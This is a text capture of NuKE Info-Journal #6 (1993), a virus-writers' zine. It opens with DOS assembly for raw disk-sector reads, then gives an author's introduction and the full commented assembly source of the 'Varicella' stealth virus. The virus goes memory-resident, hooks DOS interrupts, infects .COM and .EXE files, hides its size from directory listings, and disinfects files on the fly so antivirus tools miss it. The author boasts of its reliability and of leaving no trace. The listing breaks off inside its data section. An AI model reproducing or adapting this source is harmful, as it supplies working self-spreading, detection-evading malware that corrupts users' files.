Mov Bx,Ds ;
Rol Bx,4 ;
Push Bx ;
And Bl,0FH ;
Mov Dl,Bl ;
Pop Bx ;
Add Ax,Bx ;
Jnc NoCarry ;
Inc Dl ;
NoCarry: ;
Dec Al ; justify
Out 4,Al ; Send Low Byte of adress to the DMA controller
Mov Al,Ah ;
Out 4,Al ; Send High byte of the adress // // // //
Mov Al,Dl ;
Out 81h,Al ; Send Page number (Page register)
; Finish initialization
Mov Ax,511 ;
Out 5,Al ; DMA controller
Mov Al,Ah ;
Out 5,Al ;
Mov Al,2 ;
Out 10,Al ; DMA controller
; Get pointer to disk base
Mov Al,1EH ;
Mov Ah,35H ;
Int 021H ;
; Send read parameters.
Mov Ah,066H ; Code for single sector read
Call Out_Fdc ; Send It
Mov Ah,2 ; Head&Drive #
Call Out_FDC ; Send It
Mov Ah,1 ; Track Number
Call Out_FDC ; Send It
Mov Ah,0 ; Head #
Call Out_FDC ; Send It
Mov Ah,3 ; Sector #
Call Out_FDC ; Send it
Mov Ah,Es:[Bx]+3 ; Sector Size code (2=512 bytes)
Call Out_FDC ; Send it
Mov Ah,Es:[Bx]+4 ; End-of-track #
Call Out_FDC ; Send It
Mov Ah,Es:[Bx]+5 ; Gap length
Call Out_FDC ; Send it
Mov Ah,Es:[Bx]+6 ; Datas length
Call Out_FDC ; Send
Call Wait_Interrupt ; Wait Int 6
; Read the result bytes ..
Mov Cx,7
Lea Bx,StatusBuffer
Next:
Call In_FDC
Mov [BX],Al
Inc Bx
Loop Next
; Turn OFF the motor
Mov Dx,03F2H
Mov Al,00001101xB ; Turn Off the Drive B
Out Dx,Al
Ret ; Exit from the programm
Sector_REad Endp
Wait_interrupt Proc
; Monitor the int 6 in bios status Byte
Mov Ax,40H
Mov Es,Ax
Mov Bx,3EH
Again:
Mov Dl,Es:[BX]
Test Dl,080H
Jz Again
And Al,127
Mov Es:[Bx],Dl
Ret
Wait_Interrupt EndP
Out_FDC proc near
Mov Dx,03F4H
Keep_Trying:
In Al,Dx
Test Al,128
Jz Keep_Trying
Inc Dx
Mov Al,Ah
Out Dx,Al
RET
Out_FDC EndP
In_FDC Proc Near
Mov Dx,03F4H
Keep_Trying2:
In Al,Dx
Test Al,128
Jz Keep_Trying2
Inc Dx
In Al,Dx
Ret
In_FDC EndP
Motor_Delay Proc
Mov Ah,15 ; Perform Seek Operation
Call Out_FDC ; Out
Mov Ah,2 ; Head&Drive
Call Out_FDC ; Out
Mov Ah,1 ; track#
Call Out_FDC ;
Call Wait_interrupt ;
Ret
Motor_Delay endp
--------------------------------------------------------------------------------
; The bellow is yet, another example for reading the first few beginning tracks
; but this one is for the Hard Disk
; By X
; Not `fully completed', but enough to get the point.
Jmp TheCode
Buffer Db 512 dup (0) ; For the sector
StatusBuffer Db 7 Dup (7) ; For the status bytes
TheCode Proc Near
ReadSector:
; Turn ON the Motor
Sti
Mov Dx,03F2H
Mov Al,00101101xB ; Set the Bits 0 , 2 ,3 , 4
Out Dx,Al
; Wait for motor to come to speed (1/2 second)
Call Motor_Delay
Mov Cx,2000
Loop $
; Begin the initialization of DMA Chip
Mov Al,46H ; Code for Read Data
Out 11,Al ; Send Data
Out 12,Al
; Now , Calculate buffer adress
Lea Ax,Buffer ;
Mov Bx,Ds ;
Rol Bx,4 ;
Push Bx ;
And Bl,0FH ;
Mov Dl,Bl ;
Pop Bx ;
Add Ax,Bx ;
Jnc NoCarry ;
Inc Dl ;
NoCarry: ;
Dec Al ; justify
Out 4,Al ; Send Low Byte of address to the DMA controller
Mov Al,Ah ;
Out 4,Al ; Send High byte of the address // // // //
Mov Al,Dl ;
Out 81h,Al ; Send Page number (Page register)
; Finish initialization
Mov Ax,511 ;
Out 5,Al ; DMA controller
Mov Al,Ah ;
Out 5,Al ;
Mov Al,2 ;
Out 10,Al ; DMA controller
; Get pointer to disk base
Mov Al,1EH ;
Mov Ah,35H ;
Int 021H ;
; Send read parametres.
Mov Ah,066H ; Code for single sector read
Call Out_Fdc ; Send It
Mov Ah,0 ; Head&Drive #
Call Out_FDC ; Send It
Mov Ah,12 ; Track Number
Call Out_FDC ; Send It
Mov Ah,0 ; Head #
Call Out_FDC ; Send It
Mov Ah,3 ; Sector #
Call Out_FDC ; Send it
Mov Ah,Es:[Bx]+3 ; Sector Size code (2=512 bytes)
Call Out_FDC ; Send it
Mov Ah,Es:[Bx]+4 ; End-of-track #
Call Out_FDC ; Send It
Mov Ah,Es:[Bx]+5 ; Gap length
Call Out_FDC ; Send it
Mov Ah,Es:[Bx]+6 ; Datas length
Call Out_FDC ; Send
Call Wait_Interrupt ; Wait Int 6
; Read the result bytes ..
Mov Cx,7
Lea Bx,StatusBuffer
Next:
Call In_FDC
Mov [BX],Al
Inc Bx
Loop Next
; Turn OFF the motor
Mov Dx,03F2H
Mov Al,12
Out Dx,Al
Ret ; Exit from the programm
Sector_REad Endp
Wait_interrupt Proc
; Monitor the int 6 in bios status Byte
Mov Ax,40H
Mov Es,Ax
Mov Bx,3EH
Again:
Mov Dl,Es:[BX]
Test Dl,080H
Jz Again
And Al,127
Mov Es:[Bx],Dl
Ret
Wait_Interrupt EndP
Out_FDC proc near
Mov Dx,03F4H
Keep_Trying:
In Al,Dx
Test Al,128
Jz Keep_Trying
Inc Dx
Mov Al,Ah
Out Dx,Al
RET
Out_FDC EndP
In_FDC Proc Near
Mov Dx,03F4H
Keep_Trying2:
In Al,Dx
Test Al,128
Jz Keep_Trying2
Inc Dx
In Al,Dx
Ret
In_FDC EndP
Motor_Delay Proc
Mov Ah,15 ; Perform Seek Operation
Call Out_FDC ; Out
Mov Ah,0 ; Head&Drive
Call Out_FDC ; Out
Mov Ah,12 ; track#
Call Out_FDC ;
Call Wait_interrupt ;
Ret
Motor_Delay endp
================================================================================
�===============================================================================
Volume 1, Issue 6, May 1993
NuKE Info-Journal #6
NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE
uK E-
KE "The Varicella Virus Source Codes -N
E- Nu
-N uK
Nu By KE
uK Rock Steady E-
KE -N
E-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-Nu
ahh, NuKE PoX viruses will never end... Well I noticed a few flaws and faults
in code in the old NuKE PoX virus version 2.0, which I wanted to refine. This
time I had a lot of time, and I _fully_ commented the source codes.
% Improvements %
The most major improvement is the infection routine, I have created a generic
method that will always use the same infection/disinfection routine. If you
remember NuKE PoX v2.0 you noticed that I copied whole blocks of the code twice,
which gave the virus a size of 1800 Bytes! This version hovers at 1483 bytes,
and it's far from tight, but it's EXTREMELY reliable! Meaning this baby should
never crash for any reason. And it has _many_ added features that N-Pox v2.0
didn't have!
% Introduction to the ideology of the Stealth Virus %
Like the SVC viruses, this virus will `disinfect' on the fly. And to the DIMWIT
that said SVC doesn't disinfect by rewriting the program on disk, GO CHECK YOUR
INFO NITWIT. The SVC viruses will disinfect a file when opened, the SVC virus
will actually remove the virus from the infected program. It will NOT attempt
a disinfection in memory only! It does have the ability to do this to a
certain extent, if you execute the file, and if you jump towards the end
of the file by Int21h/4202h the SVC virus will fool DOS to think that the file
is not infected, whereby it really is. But this method has a MAJOR flaw, one
flaw is exercised by F-Prot anti-virus, to defeat this dumb method.
The major flaw is that these viruses _cannot_ keep track of file pointers, it
would take too much code to exercise this. So if you read a file from the
beginning and read sequentially toward the end, surely enough you will
encounter the SVC virus, because it does not have the ability to keep track
of the file pointer. So in order to fix this, SVC will do a _real_ disinfection
of the file on disk. Therefore in all aspects the file will look clean, as it
_is_ clean! Also note, that the SVC viruses also infect System Device drivers,
this is _rarely_ noted, maybe because people use VSUM as a reference?
% Varicella Features %
The virus will only infect .com and .exe generic files. I have removed the
.ovl infections because of certain crashes that persist with certain large
programs. No virus to date successfully does this for some reason.
The virus will hide its file length by FCB directory method (Int21h/ah=11h,12h)
and by File Handles method (Int21h/ah=4Eh,4Fh).
The virus will disinfect the file on opens & extended opens via
(Int21h/ah=3Fh,6Ch). The virus will also disinfect files as they are executed,
(Int21h/ah=4Bh) and will later reinfect it when it has terminated.
The virus will infect on closing (Int21h/ah=3Eh) and it uses the very
sophisticated Job File Table method (The List of List).
Infection is denoted by the seconds field will equal the day of the month! This
method is _a lot_ better than having the seconds field to 60 or 62, because many
AV programs flag on invalid seconds field. Therefore now the seconds field will
be from a number 1->31 (Days in a month), and only with a 6% chance of an
invalid second field stamp. Also in order not to create problems, the last two
bytes of the virus _must_ be DBh,DBh. Therefore the virus uses TWO methods of
detecting infection, because we wouldn't want to `disinfect' a file that isn't
infected, so we must be 100% sure.
I found it no use to have a `fake' disinfection routine, whereby it fakes a
disinfection, for the reason that this method contains several flaws. And I
found that testing this virus on my PC with a 40 Meg MFM 65ms drive, showed
_very_ little signs of abnormality. So in speed wise, it's very fast, what is
a 1-2 millisecond more, (1/100s of a second).
When disinfecting a file, the virus even puts back the original seconds field
time stamp, leaving absolutely no trace of its existence! How many viruses do
that? huh?
% To Come %
Well I already have a multi-partition version of this virus, I'm currently
tring to add NED polymorphic possibilities to this virus. This will be a nice
task, as NED is variable in length, therefore I have to save the original
file length, or I will fix NED to be constant in length. Nevertheless you
should see it coming soon.
% About the Name %
Well I didn't want to call this N-Pox, because it has NO code similarities
with N-Pox, the only thing they share is the method of going resident.
But I called this "Varicella" because, Varicella is the medical term for
(Chicken Pox) that adults get! When a child gets the Pox, you call it Chicken
Pox, when an adult gets it, you call it Varicella! So I found it appropriate
to call this Varicella because it is perhaps the `adult' or later out come
of the N-Pox virus. <hehe>
;=<VARICELL.ASM>================================================================
; (c) NuKE Software Development 1991, 1992, 1993
;
; VARICELLA VIRUS (Size 1483)
;
; By Rock Steady
;
; TASM VARICELL;
; TLINK/T VARICELL;
;
virus_size equ last - init_virus ;virus size (bytes)
mut1 equ 3
mut2 equ 1
mut3 equ 103h ;offset in memory
seg_a segment byte public
assume cs:seg_a,ds:seg_a
org 100h ;compile to .com
start: jmp init_virus
;-------------------------------------------------------------------------------
init_virus: call doit_now ;begin virus
doit_now: pop bp ;pop call offset
sub bp,offset doit_now ;fix it with pointer
push ax ;save registers
push ds
push es
mov ax,0abcdh ;check if virus is
int 13h ;alive in memory
jmp next_code1 ;force jump
virus_here: jmp exit_com ;error jump exit
next_code1: cmp bx,0abcdh ;cmp bx if virus alive
jnz install_virus
jmp virus_here ;yes, skip memory part
install_virus: push bx ;save registers
push cx
push dx
push si
push di
push ds
xor dx,dx ;0 value to dx
mov ds,dx ;put that in ds
les si,dword ptr ds:[0084h] ;get int21 vector
mov word ptr cs:[int21][bp],si ;save int21 offset
mov word ptr cs:[int21+2][bp],es ;save int21 segment
les si,dword ptr ds:[0070h] ;get int1c vector
mov word ptr cs:[int1c][bp],si ;save int1c offset
mov word ptr cs:[int1c+2][bp],es ;save int1c segment
les si,dword ptr ds:[004ch] ;get int13 vector
mov word ptr cs:[int13][bp],si ;save int13 offset
mov word ptr cs:[int13+2][bp],es ;save int13 segment
pop ds ;DS=PSP (.exe only)
push ds ;save DS
mov ax,ds ;ds=cx
dec ax ;dec cx, cx=mcb
mov es,ax ;es=cx, mcb
mov bx,es:mut1 ;bx=es:0003, mem size
mov dx,virus_size ;dx=virus size (bytes)
mov cl,4
shr dx,cl ;convert bytes to 16k
add dx,4 ;paragraphs + 1
mov cx,es ;cx=psp segment
sub bx,dx ;sub virus size from
inc cx ;new mem address
mov es,cx ;new segment
mov ah,4ah ;set the block size
int 21h
jc exit_mem
mov ah,48h
dec dx ;alloc the mem
mov bx,dx ;bx=# of para blocka
int 21h
jc exit_mem
dec ax ;new segment add
mov es,ax ;ax=es=mcb
mov cx,8h ;DOS is the owner
mov es:mut2,cx ;put it in mcb
sub ax,0fh
mov di,mut3 ;new offset to go
mov es,ax ;es=segment
mov si,bp ;add delta offset
add si,offset init_virus ;begining of virus
mov cx,virus_size ;our size
push cs ;get the correct
pop ds ;segment in ds
cld ;clear direction to +
repne movsb ;move us
mov ds,cx ;ds=0000
cli ;disable ints
mov word ptr ds:[0084h],offset int21_handler ;hook int21
mov word ptr ds:[0086h],es
mov word ptr ds:[0070h],offset int1c_handler ;hook int1c
mov word ptr ds:[0072h],es
mov word ptr ds:[004ch],offset int13_handler ;hook int13
mov word ptr ds:[004eh],es
sti ;enable ints
exit_mem: pop ds ;restore 'em
pop di
pop si
pop dx
pop cx
pop bx
exit_com: cmp word ptr cs:[buffer][bp],5A4Dh ;.exe file?
je exit_exe_file ;yupe exit exe file
cmp word ptr cs:[buffer][bp],4D5Ah ;.exe file?
je exit_exe_file ;yupe exit exe file
push cs ;fix cs=ds for .com
pop ds
mov bx,offset buffer ;get first 3 bytes
add bx,bp ;fix delta
mov ax,[bx] ;move first 2 bytes
mov word ptr ds:[100h],ax ;put em in the beginning
inc bx ;inc pointer
inc bx
mov al,[bx] ;get last of 3rd byte
mov byte ptr ds:[102h],al ;put that in place
pop es
pop ds
pop word ptr cs:[ax_reg][bp] ;save ax else where
mov ax,100h
push ax ;fake a CALL & RETN
mov ax,word ptr cs:[ax_reg][bp] ;put ax as normal
retn ;link to 100h
exit_exe_file: mov dx,ds ;get psp=ds seg
add dx,10h ;add 16bytes to seg
pop es
pop ds
pop ax
add word ptr cs:[buffer+22][bp],dx ;fix segments
add dx,word ptr cs:[buffer+14][bp]
cli
mov ss,dx ;restore ss
mov sp,word ptr cs:[buffer+16][bp] ;and sp
sti
jmp dword ptr cs:[buffer+20][bp] ;jmp to entry pt.
ax_reg dd 0
bp_reg dd 0
int13 dd 0
int1c dd 0
int21 dd 0
;===============================================================================
; Int 13h Handler
;===============================================================================
int13_handler:
cmp ax,0abcdh ;virus test
je int13_test ;yupe
int13call: jmp dword ptr cs:[int13] ;original int13
int13_test: mov bx,ax ;fix
iret
;===============================================================================
; Int 1Ch Handler
;===============================================================================
int1c_handler:
iret
;-------------------------------------------------------------------------------
; FCB Dir Stealth Routine (File Find)
;-------------------------------------------------------------------------------
fcb_dir: call calldos21 ;get the fcb block
test al,al ;test for error
jnz fcb_out ;jmp if error
push ax ;save registers
push bx
push cx
push es
mov ah,51h ;get current psp
call calldos21 ;call int21
mov es,bx ;es=segment of psp
cmp bx,es:[16h] ;psp of command.com?
jnz fcb_out1 ;no, then jmp
mov bx,dx ;ds:bx=fcb
mov al,[bx] ;1st byte of fcb
push ax ;save it
mov ah,2fh ;get dta
call calldos21 ;es:bx <- dta
pop ax ;get first byte
inc al ;al=ffh therefor al=ZR
jnz fcb_old ;if != ZR jmp
add bx,7h ;extended fcb here, +7
fcb_old: mov ax,es:[bx+17h] ;get file time stamp
mov cx,es:[bx+19h] ;get file date stamp
and ax,1fh ;unmask seconds field
and cx,1fh ;unmask day of month
xor ax,cx ;are they equal?
jnz fcb_out1 ;nope, exit then
sub word ptr es:[bx+1dh],virus_size ;sub away virus_size
sbb word ptr es:[bx+1fh],0 ;sub with carry flag
fcb_out1: pop es ;restore registers
pop cx
pop bx
pop ax
fcb_out: iret ;return control
;-------------------------------------------------------------------------------
; ASCIIZ Dir Stealth Routine (File Find)
;-------------------------------------------------------------------------------
dta_dir: call calldos21 ;get results to dta
jb dta_out ;if error, split
push ax ;save register
push bx
push cx
push es
mov ah,2fh ;get current dta
call calldos21 ;es:bx <- dta
mov ax,es:[bx+16h] ;get file time stamp
mov cx,es:[bx+18h] ;get file date stamp
and ax,1fh ;unmask seconds field
and cx,1fh ;unmask day of month
xor ax,cx ;are they equal
jnz dta_out1 ;nope, exit then
sub word ptr es:[bx+1ah],virus_size ;sub away virus_size
sbb word ptr es:[bx+1ch],0 ;sub with carry flag
dta_out1: pop es ;restore registers
pop cx
pop bx
pop ax
dta_out: retf 0002h ;pop 2 words of stack
;===============================================================================
; Int 21h Handler
;===============================================================================
int21_handler:
cmp ah,11h ;FCB find first match
je old_dir
cmp ah,12h ;FCB find next match
je old_dir
cmp ah,4eh ;Find first match
je new_dir
cmp ah,4fh ;Find next match
je new_dir
cmp ah,3dh ;Opening a file
je file_open
cmp ah,6ch ;Ext_opening a file
je file_ext_open
cmp ah,3eh ;closing a file
je file_close
cmp ah,4bh ;Execution of a file
je file_execute
int21call: jmp dword ptr cs:[int21] ;original int21
old_dir: jmp fcb_dir ;fcb file find
new_dir: jmp dta_dir ;new asciiz file find
file_open: jmp open_file ;disinfect opening file
file_ext_open: jmp open_ext_file ;disinfect opening file
file_close: jmp close_file ;infect closing file
file_execute: call check_extension ;check for ok ext
cmp byte ptr cs:[com_ext],1 ;is it a com?
je exec_disinfect ;yupe disinfect it
cmp byte ptr cs:[exe_ext],1 ;is it a exe?
je exec_disinfect ;yupe disinfect it
jmp SHORT int21call
exec_disinfect: call exec_disinfect1 ;Disinfect file
mov word ptr cs:[ax_reg],dx
pushf ;fake an int
call dword ptr cs:[int21] ;call dos
xchg word ptr cs:[ax_reg],dx ;restore dx
mov byte ptr cs:[close],0 ;reset flag..
push ax ;store 'em
push bx
push cx
push dx
push si
push di
push es
push ds
closing_infect: mov ax,3524h ;get error handler
call calldos21 ;call dos
push es ;save es:bx= int_24
push bx ;error handler
push ds ;ds:dx= asciiz string
push dx
push cs ;cs=ds
pop ds
mov dx,offset int21_handler ;hook error handler
mov ax,2524h ;with our int24h
call calldos21
pop dx ;restore ds:dx asciiz
pop ds ;string
cmp byte ptr cs:[close],0 ;Are we closing file?
je exec_get_att ;nope, then jmp
mov ax,word ptr cs:[handle] ;yupe, ax=file handle
jmp exec_open_ok ;jmp so you don't open
;the file twice...
exec_get_att: mov ax,4300h ;get file attribs
call calldos21 ;call dos
jnc exec_attrib ;no, error jmp
jmp exec_exit2 ;ERROR - split
exec_attrib: mov byte ptr cs:[attrib],cl
test cl,1 ;check bit 0 (read_only)
jz exec_attrib_ok ;if bit0=0 jmp
dec cx ;else turn of bit_0
mov ax,4301h ;write new attribs
call calldos21 ;call dos
exec_attrib_ok: mov ax,3d02h ;open file for r/w
call calldos21 ;call dos
jnc exec_open_ok ;ok, no error jmp
jmp exec_exit2 ;ERROR - split
exec_open_ok: xchg bx,ax ;bx=file handler
push cs ;cs=ds
pop ds
mov ax,5700h ;get file time/date
call calldos21 ;call dos
mov word ptr cs:[old_time],cx ;save file time
mov word ptr cs:[org_time],cx
mov word ptr cs:[old_date],dx ;save file date
and cx,1fh ;unmask second field
and dx,1fh ;unmask date field
xor cx,dx ;are they equal?
jnz exec_time_ok ;nope, file not infected
jmp exec_exit3 ;FILE INFECTED
exec_time_ok: and word ptr cs:[old_time],0ffe0h ;reset second bits
or word ptr cs:[old_time],dx ;seconds=day of month
mov ax,4200h ;reset ptr to beginning
xor cx,cx ;(as opened files may
xor dx,dx ; have ptr anywhere,
call calldos21 ; so be smart!)
mov word ptr cs:[marker],0DBDBh ;File Infection marker
mov dx,offset ds:[buffer] ;ds:dx buffer
mov cx,18h ;read 18h bytes
mov ah,3fh ;read from handle
call calldos21 ;call dos
jc exec_exit1 ;error? if yes jmp
sub cx,ax ;did we read 18h bytes?
jnz exec_exit1 ;if no exit
mov dx,cx ;cx=0 dx=0
mov ax,4202h ;jmp to EOF
call calldos21 ;call dos
jc exec_exit1 ;error? exit if so.
mov word ptr cs:[filesize+2],ax ;save lower 16bit fileSz
mov word ptr cs:[filesize],dx ;save upper 16bit fileSz
call chkbuf ;check if .exe
jz exec_cool ;jmp if .exe file
cmp ax,0FFF0h - virus_size ;64k-256-virus < 64k?
jb exec_cool ;if less jmp!
exec_exit1: jmp exec_exit3 ;exit!
exec_cool: mov dx,offset init_virus ;ds:dx=virus beginning
mov cx,virus_size ;cx=virus size
mov ah,40h ;write to handle
call calldos21 ;call dos
jc exec_exit1 ;error? if yes exit
sub cx,ax ;cx=ax bytes?
jnz exec_exit1 ;not equal exit
mov dx,cx ;cx=0 dx=0
mov ax,4200h ;jmp to top of file
call calldos21 ;call dos
jc exec_exit1 ;error, then exit
mov ax,word ptr cs:[filesize+2] ;ax=lower 16bit fileSize
call chkbuf ;check if .exe
jnz exec_com_file ;if !=.exe jmp
mov dx,word ptr cs:[filesize] ;get upper 16bit
mov cx,4 ;cx=0004
mov si,word ptr cs:[buffer+8] ;get exe header size
shl si,cl ;mul by 16
sub ax,si ;exe_header - filesize
sbb dx,0h ;sub with carry
mov cx,10h ;cx=0010
div cx ;ax=length in para
;dx=remaider
mov word ptr cs:[buffer+20],dx ;New IP offset address
mov word ptr cs:[buffer+22],ax ;New CS (In paragraphs)
add dx,virus_size+100h ;Dx=virus_size+256
mov word ptr cs:[buffer+16],dx ;New SP entry
mov word ptr cs:[buffer+14],ax ;New SS (in para)
add word ptr cs:[buffer+10],(virus_size)/16+1 ;min para
mov ax,word ptr cs:[buffer+10] ;ax=min para needed
cmp ax,word ptr cs:[buffer+12] ;cmp with max para
jb exec_size_ok ;jmp if ok!
mov word ptr cs:[buffer+12],ax ;nop, enter new max
exec_size_ok: mov ax,word ptr cs:[buffer+2] ;ax=file size
add ax,virus_size ;add virus to it
push ax ;push it
and ah,1 ;
mov word ptr cs:[buffer+2],ax ;restore new value
pop ax ;pop ax
mov cl,9 ;
shr ax,cl ;
add word ptr cs:[buffer+4],ax ;enter fileSz + header
mov dx,offset buffer ;ds:dx=new exe header
mov cx,18h ;cx=18h bytes to write
jmp SHORT exec_write_it ;jmp...
exec_com_file: sub ax,3 ;sub 3 for jmp address
mov word ptr cs:[buffer+1],ax ;store new jmp value
mov byte ptr cs:[buffer],0E9h ;E9h=JMP
mov dx,offset buffer ;ds:dx=buffer
mov cx,3 ;cx=3 bytes
exec_write_it: mov ah,40h ;write to file handle
call calldos21 ;call dos
mov dx,word ptr cs:[old_date] ;restore old date
mov cx,word ptr cs:[old_time] ;restore old time
mov ax,5701h ;write back to file
call calldos21 ;call dos
exec_exit3: mov ah,3eh ;close file
call calldos21 ;call dos
exec_exit2: pop dx ;restore es:bx (the
pop ds ;original int_24)
mov ax,2524h ;put back to place
call calldos21 ;call dos
pop ds
pop es
pop di ;pop registers
pop si
pop dx
xor cx,cx
mov cl,byte ptr cs:[attrib] ;get old file attrib
mov ax,4301h ;put them back
call calldos21 ;call dos
pop cx
pop bx
pop ax
cmp byte ptr cs:[close],0 ;get called by exec?
je exec_good_bye ;yep, then jmp
iret ;else exit now.
exec_good_bye: mov dx,word ptr cs:[ax_reg] ;restore dx
iret ;iret
;-------------------------------------------------------------------------------
; Close File Int21h/ah=3Eh
;-------------------------------------------------------------------------------
close_file: cmp bx,4h ;file handler > 4?
ja close_cont ;jmp if above
jmp int21call ;else exit
close_cont: push ax ;save 'em
push bx
push cx
push dx
push si
push di
push es
push ds
push bx ;save file handler
mov ax,1220h ;get job file table!
int 2fh ;call multiplex
;es:di=JFT for handler
mov ax,1216h ;get system file table
mov bl,es:[di] ;bl=SFT entry
int 2fh ;call multiplex
pop bx ;save file handler
add di,0011h
mov byte ptr es:[di-0fh],02h ;set to read/write
add di,0017h
cmp word ptr es:[di],'OC' ;check for .COM file
jne closing_next_try ;no try next ext
cmp byte ptr es:[di+2h],'M' ;check last letter
je closing_cunt3 ;no, file no good, exit
closing_exit: jmp closing_nogood ;exit
closing_next_try:
cmp word ptr es:[di],'XE' ;check for .EXE file
jne closing_exit ;no, exit
cmp byte ptr es:[di+2h],'E' ;check last letter
jne closing_exit ;no, exit
closing_cunt3: mov byte ptr cs:[close],1 ;set closing flag
mov word ptr cs:[handle],bx ;save handler
jmp closing_infect ;infect file!
closing_nogood: pop ds ;restore 'em
pop es
pop di
pop si
pop dx
pop cx
pop bx
pop ax
jmp int21call ;good bye, baby...
;-------------------------------------------------------------------------------
; Execute Disinfecting routine
;-------------------------------------------------------------------------------
exec_disinfect1 PROC
push ax ;save registers
push bx
push cx
push dx
push ds
mov ax,4300h ;get file attribs
call calldos21 ;call dos
test cl,1h ;is Read-only flag?
jz okay_dis ;no, jmp attribs ok
dec cx ;turn off bit 0
mov ax,4301h ;write new attribs
call calldos21 ;call dos
jnc okay_dis ;No error? then jmp
jmp end_dis ;error? exit!
okay_dis: mov ax,3d02h ;open file for r/w
call calldos21 ;call dos
jnc dis_fileopen ;No error? then jmp
jmp end_dis ;Error? exit!
dis_fileopen: xchg bx,ax ;bx=file handle
mov ax,5700h ;get file time/date
call calldos21 ;call dos
mov word ptr cs:[old_time],cx ;save file time
mov word ptr cs:[old_date],dx ;save file date
and cx,1fh ;unmask second field
and dx,1fh ;unmask date field
xor cx,dx ;are they equal?
jnz half_way ;nope, file not infected
mov ax,4202h ;jmp to EOF
xor cx,cx ;cx=0
xor dx,dx ;dx=0
call calldos21 ;call dos
push cs ;cs=ds
pop ds ;
mov cx,dx ;dx:ax=file size
mov dx,ax ;save to cx:dx
push cx ;save upper fileSz
push dx ;save lower fileSz
sub dx,1Ch ;filesize-1C=origin byte
sbb cx,0 ;sub with carry
mov ax,4200h ;position ptr
call calldos21 ;call dos
mov ah,3fh ;open file
mov cx,1Ch ;read last 1Ch bytes
mov dx,offset org_time ;put in ds:dx
call calldos21 ;call dos
call chkbuf ;Did it work?
je half ;Yes,Jmp
cmp word ptr ds:[marker],0DBDBh ;File REALLY Infected?
je half ;Yes, then jmp
pop dx
pop cx
half_way: jmp end_dis1 ;exit, error!
half: xor cx,cx ;cx=0
xor dx,dx ;dx=0
mov ax,4200h ;pointer to top of file
call calldos21 ;call dos
mov ah,40h ;write function
mov dx,offset buffer ;ds:dx=buffer
mov cx,18h ;cx=18h bytes to write
call chkbuf ;check if .exe?
jz SHORT dis_exe_jmp ;yupe, jmp
mov cx,3h ;else write 3 bytes
dis_exe_jmp: call calldos21 ;call dos
pop dx ;pop original fileSz
pop cx
sub dx,virus_size ;Sub with virus_size
sbb cx,0 ;sub with carry
mov ax,4200h ;ptr top of virus
call calldos21 ;call dos
mov ah,40h ;write function
xor cx,cx ;write 0 bytes
call calldos21 ;call dos! (new EOF)
mov cx,word ptr ds:[org_time] ;get original time
mov dx,word ptr ds:[old_date] ;get original date
mov ax,5701h ;put back to file
call calldos21 ;call dos
end_dis1: mov ah,3eh ;close file handle
call calldos21 ;call dos
end_dis: pop ds ;restore values
pop dx
pop cx
pop bx
pop ax
ret
exec_disinfect1 ENDP
;-------------------------------------------------------------------------------
; Open File by DOS Int21h/ah=6ch
;-------------------------------------------------------------------------------
open_ext_file: push dx ;save DX
mov dx,si ;asciiz=DS:DX now
jmp open_ext ;jmp
;-------------------------------------------------------------------------------
; Open File by DOS Int21h/ah=3Dh
;-------------------------------------------------------------------------------
open_file: push dx ;save dx (asciiz)
open_ext: call check_extension ;check extension
cmp byte ptr cs:[com_ext],1 ;is it a .com?
je open_ok_ext ;yep, then jmp
cmp byte ptr cs:[exe_ext],1 ;is it a .exe?
je open_ok_ext ;yep, them jmp
jmp open_exit ;ext no good, exit!
open_ok_ext: call exec_disinfect1 ;disinfect file!
open_exit: pop dx ;restore dx
jmp int21call ;exit to dos...
;-------------------------------------------------------------------------------
; Checks Buffer (EXE) Header
;-------------------------------------------------------------------------------
chkbuf PROC
push si ;save register
mov si,word ptr cs:[buffer] ;get first word
cmp si,5A4Dh ;si=ZM?
je chkbuf_ok ;if yes exit
cmp si,4D5Ah ;si=MZ?
chkbuf_ok: pop si ;pop register
ret
chkbuf ENDP
;-------------------------------------------------------------------------------
; Check file Extension
;-------------------------------------------------------------------------------
check_extension PROC
pushf ;save flags
push cx ;save cx,si
push si
mov si,dx ;ds:[si]=asciiz
mov cx,128 ;scan 128 bytes max
mov byte ptr cs:[com_ext],0 ;reset .com flag
mov byte ptr cs:[exe_ext],0 ;reset .exe flag
check_ext: cmp byte ptr ds:[si],2Eh ;scan for "."
je check_ext1 ;jmp if found
inc si ;else inc and loop
loop check_ext ;loop me
check_ext1: inc si ;inc asciiz ptr
cmp word ptr ds:[si],'OC' ;is it .COM
jne check_ext2 ; ~~
cmp byte ptr ds:[si+2],'M' ;is it .COM
je com_file_ext ; ~
check_ext2: cmp word ptr ds:[si],'oc' ;is it .com
jne check_ext3 ; ~~
cmp byte ptr ds:[si+2],'m' ;is it .com
je com_file_ext ; ~
check_ext3: cmp word ptr ds:[si],'XE' ;is it .EXE
jne check_ext4 ; ~~
cmp byte ptr ds:[si+2],'E' ;is it .EXE
je exe_file_ext ; ~
check_ext4: cmp word ptr ds:[si],'xe' ;is it .exe
jne check_ext_exit ; ~~
cmp byte ptr ds:[si+2],'e' ;is it .exe
je exe_file_ext ; ~
jmp check_ext_exit ;neither exit
com_file_ext: mov byte ptr cs:[com_ext],1 ;found .com file
jmp SHORT check_ext_exit ;jmp short
exe_file_ext: mov byte ptr cs:[exe_ext],1 ;found .exe file
check_ext_exit: pop si ;restore
pop cx
popf ;save flags
ret
com_ext db 0 ;flag on=.com file
exe_ext db 0 ;flag on=.exe file
check_extension ENDP
;-------------------------------------------------------------------------------
; Original Int21h
;-------------------------------------------------------------------------------
calldos21 PROC
pushf ;fake int call
call dword ptr cs:[int21] ;call original int_21
ret
calldos21 ENDP
;===============================================================================
; Int 24h Handler
;===============================================================================
int24_handler:
mov al,3 ;don't report error...
iret ;later dude...
;-------------------------------------------------------------------------------
; FLAGS - FLAGS - FLAGS - FLAGS - FLAGS
close db 0 ;closing file
;-------------------------------------------------------------------------------
; END - END - END - END - END - END - END
flags dw 0 ;Flags are saved here
attrib db 0 ;file's attrib
filesize dd 0 ;filesize
handle dw 0 ;file handler
old_date dw 0 ;file date
old_time dw 0 ;file time
org_time dw 0 ;original file time
;-------------------------------------------------------------------------------
buffer db 0CDh,020h ; 0 (0) EXE file signature
db 090h,090h ; 2 (2) Length of file
db 090h,090h ; 4 (4) Size of file + header (512k)
db 090h,090h ; 6 (6) # of relocation items
db 090h,090h ; 8 (8) Size of header (16byte para)
db 090h,090h ; A (10) Min para needed (16byte)
db 090h,090h ; C (12) Max para needed (16byte)
